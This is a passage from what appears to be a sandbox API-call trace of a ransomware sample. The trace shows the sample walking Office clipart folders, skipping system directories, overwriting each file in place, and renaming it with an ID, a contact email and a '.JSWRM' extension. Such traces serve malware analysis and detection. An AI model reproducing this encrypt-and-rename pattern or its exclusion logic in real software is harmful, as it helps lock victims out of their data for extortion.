lpUsedDefaultChar=0x0) returned 5 [0087.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.060] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12292) returned 1 [0087.060] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3000) returned 0x24d210 [0087.060] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3000, lpOverlapped=0x0) returned 1 [0087.063] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.063] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3000, lpOverlapped=0x0) returned 1 [0087.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.063] CloseHandle (hObject=0x314) returned 1 [0087.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0087.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0087.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0087.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0087.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0087.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.064] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0087.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.065] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb3c2ce, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb3c2ce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188519.WMF", cAlternateFileName="")) returned 1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2=".") returned 1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="..") returned 1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="...") returned 1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="windows") returned -1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="recovery") returned -1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="perflogs") returned -1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="documents and settings") returned 1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="system volume information") returned -1 [0087.065] lstrcmpiW (lpString1="J0188519.WMF", lpString2="msocache") returned -1 [0087.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188519.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188519.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188519.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0087.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188519.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188519.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188519.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0087.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.066] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5824) returned 1 [0087.066] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16c0) returned 0x205850 [0087.066] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16c0, lpOverlapped=0x0) returned 1 [0087.068] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.068] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16c0, lpOverlapped=0x0) returned 1 [0087.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.068] CloseHandle (hObject=0x314) returned 1 [0087.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0087.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0087.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0087.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0087.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0087.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0087.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.070] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b5c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188587.WMF", cAlternateFileName="")) returned 1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2=".") returned 1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="..") returned 1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="...") returned 1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="windows") returned -1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="recovery") returned -1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="perflogs") returned -1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="documents and settings") returned 1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="system volume information") returned -1 [0087.070] lstrcmpiW (lpString1="J0188587.WMF", lpString2="msocache") returned -1 [0087.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0087.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188587.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188587.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188587.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0087.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188587.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188587.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188587.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.071] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15196) returned 1 [0087.071] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b50) returned 0x24d210 [0087.071] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3b50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3b50, lpOverlapped=0x0) returned 1 [0087.073] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.073] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3b50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3b50, lpOverlapped=0x0) returned 1 [0087.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.073] CloseHandle (hObject=0x314) returned 1 [0087.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0087.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0087.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0087.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0087.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0087.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0087.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.075] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb62536, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb62536, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb62536, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e9e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0188667.WMF", cAlternateFileName="")) returned 1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2=".") returned 1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="..") returned 1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="...") returned 1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="windows") returned -1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="recovery") returned -1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="perflogs") returned -1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="documents and settings") returned 1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="system volume information") returned -1 [0087.075] lstrcmpiW (lpString1="J0188667.WMF", lpString2="msocache") returned -1 [0087.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0087.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188667.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188667.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188667.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0087.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188667.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0188667.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0188667.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.076] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16030) returned 1 [0087.076] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e90) returned 0x24d210 [0087.076] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3e90, lpOverlapped=0x0) returned 1 [0087.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.087] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3e90, lpOverlapped=0x0) returned 1 [0087.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.087] CloseHandle (hObject=0x314) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: 